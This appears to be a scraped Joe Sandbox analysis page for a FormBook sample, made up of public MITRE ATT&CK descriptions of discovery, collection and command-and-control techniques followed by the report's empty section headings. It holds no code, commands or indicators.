Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report J0OmHIagw8.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets